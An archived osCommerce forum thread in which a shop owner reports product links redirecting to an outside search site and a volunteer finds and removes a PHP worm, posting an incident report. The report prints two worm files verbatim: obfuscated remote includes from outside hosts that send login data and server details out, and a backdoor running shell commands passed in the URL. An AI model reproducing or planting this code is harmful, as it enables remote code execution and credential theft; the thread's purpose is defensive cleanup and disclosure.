Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

My links are taking people out to the web, why?


Guest

Recommended Posts

Can someone help? our site www.jawproducts.com works fine if you use the regular links, but if you type an item in the search box, i.e. microbrush, then when the micrbrushes come up, if you click on the product, it takes you out onto the web! it worked fine for months and now this happens. i thought it was the advanced search file but it matches up fine with the backup file. Does anyone know how to fix this?ANYTHING we click on from the advanced_search_results.php page goes out onto the web instead of staying on our site

Link to comment
Share on other sites

Can someone please help me? my host just says they will get back to me and they never do.

if you go to www.jawproducts.com and use the "search' tab at the top , then type a word , just say "microbrush". then it takes you to the results. when you click on one of the results, the page takes you outside of my site to search.biz.tm , and i dont know why! ipower just installed a dedicated ssl certif on our site, i configured it and everything and now suddenly this is happening and i dont know why! they wont give me any answer, is this something i did wrong? i am new to this sorry!

Link to comment
Share on other sites

You'd better have a look for "foreign" files on your server. If I copy the link and paste into a new tab instead of clicking it takes me to the product page.

 

As you say clicking the product link takes me offsite.

Local: Mac OS X 10.5.8 - Apache 2.2/php 5.3.0/MySQL 5.4.10 • Web Servers: Linux

Tools: BBEdit, Coda, Versions (Subversion), Sequel Pro (db management)

Link to comment
Share on other sites

I am new to this, i know what you mean, if you copy and paste it looks right. when you say foreign files, you mean someone probably installed a file on my server? i dont know how they can do that if my admin is passworded? But would that be the source?

Link to comment
Share on other sites

I checked and i dont see any foreign files. i dont know what to do, no one seems to know how to fix this , no one at my host is answering me, they just say we'll get back to you; i dont see anything on the web regarding this, i dont know what is going on

Link to comment
Share on other sites

If you watch closely you can see that something is capturing the link after the POST and then redirecting.

Local: Mac OS X 10.5.8 - Apache 2.2/php 5.3.0/MySQL 5.4.10 • Web Servers: Linux

Tools: BBEdit, Coda, Versions (Subversion), Sequel Pro (db management)

Link to comment
Share on other sites

I looked but i dont know how to fix that/ do you? is this something that i just cannot fix? i see that it adds manufacturer_id or something and another of my sites does not do that, but is that the problem? i do not know how to fix this, i only see that its adding ?manufacturers_id but i dont know why that would cause this, i dont know what to do, i have spent 2 days researching this and i am stuck

Link to comment
Share on other sites

It may be something that's not even in your account on the server. Maybe another site is infected and it's worked its way up.

 

The results from your advanced search look just like mine on a test server (aside from the keywords).

Local: Mac OS X 10.5.8 - Apache 2.2/php 5.3.0/MySQL 5.4.10 • Web Servers: Linux

Tools: BBEdit, Coda, Versions (Subversion), Sequel Pro (db management)

Link to comment
Share on other sites

I swear i think ipower did this; it was the second they installed my SSL certificate, and now there are all these folders outside of my catalog folder, in the publichtml folder, theres a folder called "lh" that i never saw before, and theres all these other folders ive never seen. so you are saying theres nothing i can do?

Link to comment
Share on other sites

I swear i think ipower did this; it was the second they installed my SSL certificate, and now there are all these folders outside of my catalog folder, in the publichtml folder, theres a folder called "lh" that i never saw before, and theres all these other folders ive never seen. so you are saying theres nothing i can do?

What's in those folders? How many are there? I doubt they're needed for ssl.

Local: Mac OS X 10.5.8 - Apache 2.2/php 5.3.0/MySQL 5.4.10 • Web Servers: Linux

Tools: BBEdit, Coda, Versions (Subversion), Sequel Pro (db management)

Link to comment
Share on other sites

There are a ton of new folders and files inside the folders that say "chat_smiles" and some others, right now im ftp'ing all my files to my hard drive so that i can do a search on all the files at once to see if theres any redirect links or something. I have no idea what is going on

Link to comment
Share on other sites

There are a ton of new folders and files inside the folders that say "chat_smiles" and some others, right now im ftp'ing all my files to my hard drive so that i can do a search on all the files at once to see if theres any redirect links or something. I have no idea what is going on

An easier thing might be to create a new folder in the htdocs folder named temp or unused.

 

Then move the folders that you suspect into that one for now and test again.

Local: Mac OS X 10.5.8 - Apache 2.2/php 5.3.0/MySQL 5.4.10 • Web Servers: Linux

Tools: BBEdit, Coda, Versions (Subversion), Sequel Pro (db management)

Link to comment
Share on other sites

This is from the top of that search.biz page.

 

<html>

<head>

<title>Search.biz.tm : Search Results : microbrush</title>

<meta http-equiv=Content-Type content="text/html; charset=iso-8859-1">

<link href="/1/style000.css" rel="stylesheet" type="text/css">

<script language=javascript>

<!--

function se(k) {

var link='htt'+'p:/'+'/s'+'ear'+''+'ch.b'+'i'+'z.t'+'m'+'/s'+'ea'+'rch.php?qq='+k+'&said=pv'+'&d=1';

window.location = link;

}

//-->

</script>

</head>

 

I don't know what they're doing or where they grab the input for that.

Local: Mac OS X 10.5.8 - Apache 2.2/php 5.3.0/MySQL 5.4.10 • Web Servers: Linux

Tools: BBEdit, Coda, Versions (Subversion), Sequel Pro (db management)

Link to comment
Share on other sites

Thanks for your help. I don't know what to do. I honestly have no idea what i am going to do because I don't know how to fix this.

Just keep on plugging away at it and you'll find the cause. It's not osC that's doing it.

Local: Mac OS X 10.5.8 - Apache 2.2/php 5.3.0/MySQL 5.4.10 • Web Servers: Linux

Tools: BBEdit, Coda, Versions (Subversion), Sequel Pro (db management)

Link to comment
Share on other sites

It could be anywhere...something like this is a needle in a haystack scenario. Usually the low life that did this will do their best to hide or obfuscate the code.

Link to comment
Share on other sites

BTW, I sent you a PM...basically, I'll take a look at the issue for you at no cost just because I hate the scum that do these type of things. Once I find out what is causing it I'll post the finidngs so that others won't have to suffer like this.

Link to comment
Share on other sites

you will? oh my gosh, you are amazing! i will pay you for it, let me know how much.

As I said in the PM and the post above...I will do this free of charge and do not want payment. My sole intention is to find the issue then post the findings on the board so other store owners won't have to go through this. A while back some scum got into my site and uploaded some of those PayPal email scripts. They used my server and account to send thousands of spam emails...ever since then I've been on a crusade to crush every piece of crap scammer I can as a service to society.

 

I've already started to debug the site. For example, anytime you have $_GET['keywords'] set the very next click will take you offsite. This leads me to believe it is not JS but rather PHP code using headers for the redirect. I'll bet you I can find the source of the problem is less than 30 minutes (or double your free money back!) :)

Link to comment
Share on other sites

EXECUTIVE SUMMARY

The site owner complained of unwanted redirects to an external on product search. This was verified and observed that the behavior was not limited to the search page. Anytime $_GET['keywords'] was set it redirected to the external site on next link click. This was a global behavior and was symptomatic on all scripts in the catalog directory.

 

SUMMARY FINDINGS

Upon inspection it was noticed several worm files in the images directory. A total of 22 worm files were found in the images directory (recursive count). Each directory had 2 PHP files...a remote and replicator respectively. The remote script code enabled arbitrary system commands to be executed. The replicator script copied both files to all available locations. These same pair of files were also found in other directories with 744 CHMOD permissions. This indicates the criminal obtained main FTP user credentials. The initiator code was finally located in the includes/languages/english/header_tags.php file at the bottom just above the closing php tag.

 

The following actions were taken to rectify the security breach:

 

(1) Custom PHP script creation that automatically searches for and deletes the worm PHP files. This custom cleaner script now resides as an admin control panel tool that is conveniently located for the site owner

 

(2) The htaccess file in each affected directory was appended this code to alleviate PHP script execution:

<Files *.php>
Order Deny,Allow
Deny from all
</Files>

This code should prevent HTTP access to the files but will still allow PHP include directives to be executed by the daemon.

 

(3) Advisement of the site owner to change passwords immediately to eliminate the criminal from utilizing the same user credentials to re-initiate the attack.

 

EXAMPLE CODE FROM WORM FILES

File #1

error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
if(isset($_POST["input"])){
	$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));
} else {
	$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];
}
} else {
$user_auth="";
}
if(!isset($_POST["log_flg"])){
$log_flg="&log";
}

if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}

File #2

error_reporting(0);
$s="e";
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s";
if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);}

 

Total time to de-worm the site was just under 2 hours...1.5 hours over the estimate 30 minutes in the posts above. Thus, I owe Jennifer double her free money back :)

Link to comment
Share on other sites

This is interesting

 

From the Header Tags Controller contribution...

 

File: corrections_to_Header_Tags_Controller.txt

 

ADDITIONAL CORRECTIONS TO INSTALL INSTRUCTIONS (by Steve(aka 241))

 

There is a vital instruction missing from the install instructions which should tell you to set two files with permissions CHMOD 666

 

catalog/includes/header_tags.php

 

catalog/includes/languages/english/header_tags.php

 

This makes it an easier target than most files.

Local: Mac OS X 10.5.8 - Apache 2.2/php 5.3.0/MySQL 5.4.10 • Web Servers: Linux

Tools: BBEdit, Coda, Versions (Subversion), Sequel Pro (db management)

Link to comment
Share on other sites

Alan,

 

I don't think it is a contribution security issue but rather the server that the site is hosted on has been rooted. Once again, the tell all sign is that the worm files had proper user permissions and ownership...thus the attacker had either user level credentials OR root credentials and SU via terminal.

 

Since the passwords were going to be changed anyway the site owner supplied me with the main user credentials. From this I can tell that the password would have very little chance for brute force. BTW, Jennifer...you DID change ALL the passwords, right?

 

I can assume with a high degree of certainty that the server has been rooted. It concerns me as her site is hosted on ipow which is a very active hosting company. There could be thousands of osC sites which are affected by the fact the server has been rooted...of course if they are hosted with ipow.

 

I have sent an email to the ipow administration with the replicator file code and other information / data. However, if any store owners have a site hosted with ipow I would recommend a site script inspection to ensure it is clean of worm files. I have seen the replicator code and with root permissions it can replicate the worm files to EVERY account on that server...in addition, it can reach out to every server in the cluster.

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...